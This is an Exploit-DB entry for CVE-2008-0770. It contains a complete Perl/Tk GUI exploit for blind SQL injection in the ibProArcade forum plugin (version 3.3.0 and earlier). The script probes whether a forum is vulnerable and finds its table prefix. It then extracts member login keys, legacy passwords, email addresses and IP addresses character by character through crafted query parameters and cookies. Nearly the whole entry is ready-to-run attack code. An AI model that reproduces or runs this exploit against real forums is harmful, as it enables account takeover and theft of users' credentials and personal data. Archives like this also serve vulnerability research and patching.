ibProArcade <= 3.3.0 - Remote SQL Injection Exploit

2008-01-30T00:00:00
ID EDB-ID:5018
Type exploitdb
Reporter RST/GHC
Modified 2008-01-30T00:00:00

Description

ibProArcade <= 3.3.0 Remote SQL Injection Exploit. CVE-2008-0770. Webapps exploit for php platform

                                        
                                            #!/usr/bin/perl

## ibProArcade &lt;= v3.3.0 sql injection exploit
## (c)oded by 1dt.w0lf
## RST/GHC

##        THIS IS UNPUBLISHED RST/GHC EXPLOIT CODE
##                   KEEP IT PRIVATE

use Tk;
use Tk::BrowseEntry;
use Tk::DialogBox;
use LWP::UserAgent;

BEGIN {
if($^O eq 'MSWin32'){
require Win32::Console;
Win32::Console::Free();
}
}

$mw = new MainWindow(title =&gt; "r57ibProArcade" );

$mw-&gt;geometry ( '420x310' ) ;
$mw-&gt;resizable(0,0);

$mw-&gt;Label(-text =&gt; '!', -font =&gt; '{Webdings} 22')-&gt;pack();
$mw-&gt;Label(-text =&gt; 'ibProArcade sql injection exploit by RST/GHC', -font =&gt; '{Verdana} 7 bold',-foreground=&gt;'red')-&gt;pack();
$mw-&gt;Label(-text =&gt; '')-&gt;pack();

$fleft=$mw-&gt;Frame()-&gt;pack ( -side =&gt; 'left', -anchor =&gt; 'ne') ;
$fright=$mw-&gt;Frame()-&gt;pack ( -side =&gt; 'left', -anchor =&gt; 'nw') ;

$url = 'http://127.0.0.1/ipb216/index.php';
$user_id = '1';
$prefix = 'ibf_';
$column = 'member_login_key';
$report = '';
$true = 0;
$false = 0;

$fleft-&gt;Label ( -text =&gt; 'Path to forum index: ', -font =&gt; '{Verdana} 8 bold') -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'e' ) ;
$fright-&gt;Entry ( -relief =&gt; "groove", -width =&gt; 35, -font =&gt; '{Verdana} 8', -textvariable =&gt; \$url) -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'w' ) ;

$fleft-&gt;Label ( -text =&gt; 'User ID: ', -font =&gt; '{Verdana} 8 bold' ) -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'e' ) ;
$fright-&gt;Entry ( -relief =&gt; "groove", -width =&gt; 35, -font =&gt; '{Verdana} 8', -textvariable =&gt; \$user_id) -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'w' ) ;

$fleft-&gt;Label ( -text =&gt; 'Database tables prefix: ', -font =&gt; '{Verdana} 8 bold') -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'e' ) ;
$fright-&gt;Entry ( -relief =&gt; "groove", -width =&gt; 35, -font =&gt; '{Verdana} 8', -textvariable =&gt; \$prefix) -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'w' ) ;

$fright-&gt;Label( -text =&gt; ' ')-&gt;pack();
$fleft-&gt;Label( -text =&gt; ' ')-&gt;pack();

$fleft-&gt;Label ( -text =&gt; 'get data from database', -font =&gt; '{Verdana} 8 bold',-foreground=&gt;'green') -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'e' ) ;
$fright-&gt;Label( -text =&gt; ' ')-&gt;pack();

$fleft-&gt;Label ( -text =&gt; 'Get data from column: ', -font =&gt; '{Verdana} 8 bold') -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'e' ) ;
$b = $fright-&gt;BrowseEntry( -relief =&gt; "groove", -variable =&gt; \$column, -font =&gt; '{Verdana} 8');
$b-&gt;insert("end", "member_login_key");
$b-&gt;insert("end", "name");
$b-&gt;insert("end", "ip_address");
$b-&gt;insert("end", "legacy_password");
$b-&gt;insert("end", "email");
$b-&gt;pack( -side =&gt; "top" , -anchor =&gt; 'w' );

$fleft-&gt;Label ( -text =&gt; 'Returned data: ', -font =&gt; '{Verdana} 8 bold') -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'e' ) ;
$fright-&gt;Entry ( -relief =&gt; "groove", -width =&gt; 35, -font =&gt; '{Verdana} 8', -textvariable =&gt; \$report) -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'w' ) ;


$fright-&gt;Label( -text =&gt; ' ')-&gt;pack();

$fright-&gt;Button(-text    =&gt; 'Test forum vulnerability',
                -relief =&gt; "groove",
                -width =&gt; '30',
                -font =&gt; '{Verdana} 8 bold',
                -activeforeground =&gt; 'red',
                -command =&gt; \&test_vuln
               )-&gt;pack();

$fright-&gt;Button(-text    =&gt; 'Get database tables prefix',
                -relief =&gt; "groove",
                -width =&gt; '30',
                -font =&gt; '{Verdana} 8 bold',
                -activeforeground =&gt; 'red',
                -command =&gt; \&get_prefix
               )-&gt;pack();

$fright-&gt;Button(-text    =&gt; 'Get data from database',
                -relief =&gt; "groove",
                -width =&gt; '30',
                -font =&gt; '{Verdana} 8 bold',
                -activeforeground =&gt; 'red',
                -command =&gt; \&get_data
               )-&gt;pack();



$fleft-&gt;Label( -text =&gt; ' ')-&gt;pack();
$fleft-&gt;Label( -text =&gt; '+++ PRIV8 +++', -font =&gt; '{Verdana} 7')-&gt;pack();
$fleft-&gt;Label( -text =&gt; '(c)oded by 1dt.w0lf', -font =&gt; '{Verdana} 7')-&gt;pack();
$fleft-&gt;Label( -text =&gt; 'RST/GHC', -font =&gt; '{Verdana} 7')-&gt;pack();

MainLoop();

sub get_data()
{
$true = &get_true();

$report = '';  
$s_num=1;
while(($chr = &found(0,255))!=0){
$report .= chr($chr);
$mw-&gt;update();
$s_num++;
}
if(length($report) &gt; 0) { &report('That\'s all ;)'); }
else { &report('Can\'t get data from database'); }

}

sub test_vuln()
{
$InfoWindow=$mw-&gt;DialogBox(-title   =&gt; 'test forum vulnerability', -buttons =&gt; ["OK"]);
$InfoWindow-&gt;add('Label', -text =&gt; '', -font =&gt; '{Verdana} 8')-&gt;pack;
$InfoWindow-&gt;add('Label', -text =&gt; $url, -font =&gt; '{Verdana} 8')-&gt;pack;
$InfoWindow-&gt;add('Label', -text =&gt; '', -font =&gt; '{Verdana} 8')-&gt;pack;

$true = &get_true();
$false = &get_false();

if($true != $false) { $InfoWindow-&gt;add('Label', -text =&gt; 'FORUM VULNERABLE', -font =&gt; '{Verdana} 8 bold',-foreground=&gt;'red')-&gt;pack; }
else { $InfoWindow-&gt;add('Label', -text =&gt; 'FORUM UNVULNERABLE', -font =&gt; '{Verdana} 8 bold',-foreground=&gt;'green')-&gt;pack; }

$InfoWindow-&gt;Show();
$InfoWindow-&gt;destroy;
}

sub get_true()
{
$xpl = LWP::UserAgent-&gt;new( ) or die;
$res = $xpl-&gt;get($url."?autocom=arcade&overwrite_sort=added&overwrite_order=,(-gid*(1=1))");
if($res-&gt;as_string =~ /g=(\d+)" target="hiddenframe"&gt;&lt;img src=".\/arcade\/images\/addfav.gif"/) { $rep = $1; }
return $rep;
}

sub get_false()
{
$xpl = LWP::UserAgent-&gt;new( ) or die;
$res = $xpl-&gt;get($url."?autocom=arcade&overwrite_sort=added&overwrite_order=,(-gid*(1=2))");
if($res-&gt;as_string =~ /g=(\d+)" target="hiddenframe"&gt;&lt;img src=".\/arcade\/images\/addfav.gif"/) { $rep = $1; }
return $rep;
}
 
sub get_prefix()
{
$InfoWindow=$mw-&gt;DialogBox(-title   =&gt; 'get database tables prefix', -buttons =&gt; ["OK"]);
$InfoWindow-&gt;add('Label', -text =&gt; '', -font =&gt; '{Verdana} 8')-&gt;pack;
$InfoWindow-&gt;add('Label', -text =&gt; $url, -font =&gt; '{Verdana} 8')-&gt;pack;
$InfoWindow-&gt;add('Label', -text =&gt; '', -font =&gt; '{Verdana} 8')-&gt;pack;
$xpl = LWP::UserAgent-&gt;new( ) or die;
$res = $xpl-&gt;get($url."?autocom=arcade&overwrite_sort=added&overwrite_order=r57r0x");
if($res-&gt;is_success)
 {
 $rep = '';
 if($res-&gt;as_string =~ /from (.*)games_list/)
 {
 $prefix = $1;
 $InfoWindow-&gt;add('Label', -text =&gt; 'Prefix: '.$prefix, -font =&gt; '{Verdana} 8 bold')-&gt;pack;
 }
 else
 {
 $InfoWindow-&gt;add('Label', -text =&gt; 'Can\'t get prefix', -font =&gt; '{Verdana} 8 bold',-foreground=&gt;'red')-&gt;pack; }
 }
else
 {
 $InfoWindow-&gt;add('Label', -text =&gt; 'Error!', -font =&gt; '{Verdana} 8 bold',-foreground=&gt;'red')-&gt;pack;
 $InfoWindow-&gt;add('Label', -text =&gt; $res-&gt;status_line, -font =&gt; '{Verdana} 8')-&gt;pack;
 }
$InfoWindow-&gt;Show();
$InfoWindow-&gt;destroy;  
}

sub found($$)
 {
 my $fmin = $_[0];
 my $fmax = $_[1];
 if (($fmax-$fmin)&lt;5) { $i=crack($fmin,$fmax); return $i; }
 
 $r = int($fmax - ($fmax-$fmin)/2);
 $check = " BETWEEN $r AND $fmax";
 if ( &check($check) ) { &found($r,$fmax); }
 else { &found($fmin,$r); }
 }
 
sub crack($$)
 {
 my $cmin = $_[0];
 my $cmax = $_[1];
 $i = $cmin;
 while ($i&lt;$cmax)
  {
  $crcheck = "=$i";
  if ( &check($crcheck) ) { return $i; }
  $i++;
  }
 $i = 0;
 return $i;
 }
 
sub check($)
 {
 $n++;
 $rep = '';
 $ccheck = $_[0];
 $xpl = LWP::UserAgent-&gt;new( ) or die;
 $res = $xpl-&gt;get($url.'?autocom=arcade',cookie=&gt;'g_display_sort=added;g_display_order=,(-gid*(SELECT 1 FROM '.$prefix.'members WHERE (id='.$user_id.' AND ascii(substring('.$column.','.$s_num.',1))'.$ccheck.') LIMIT 1)) LIMIT 1');
 if($res-&gt;as_string =~ /g=(\d+)" target="hiddenframe"&gt;&lt;img src=".\/arcade\/images\/addfav.gif"/) { $rep = $1; }
 if($rep == $true) { return 1; }
 else { return 0; }
 }
 
sub report()
{
$InfoWindow=$mw-&gt;DialogBox(-title   =&gt; 'Report', -buttons =&gt; ["OK"]);
$InfoWindow-&gt;add('Label', -text =&gt; $_[0], -font =&gt; '{Verdana} 7')-&gt;pack;
$InfoWindow-&gt;Show();
$InfoWindow-&gt;destroy;
}

# milw0rm.com [2008-01-30]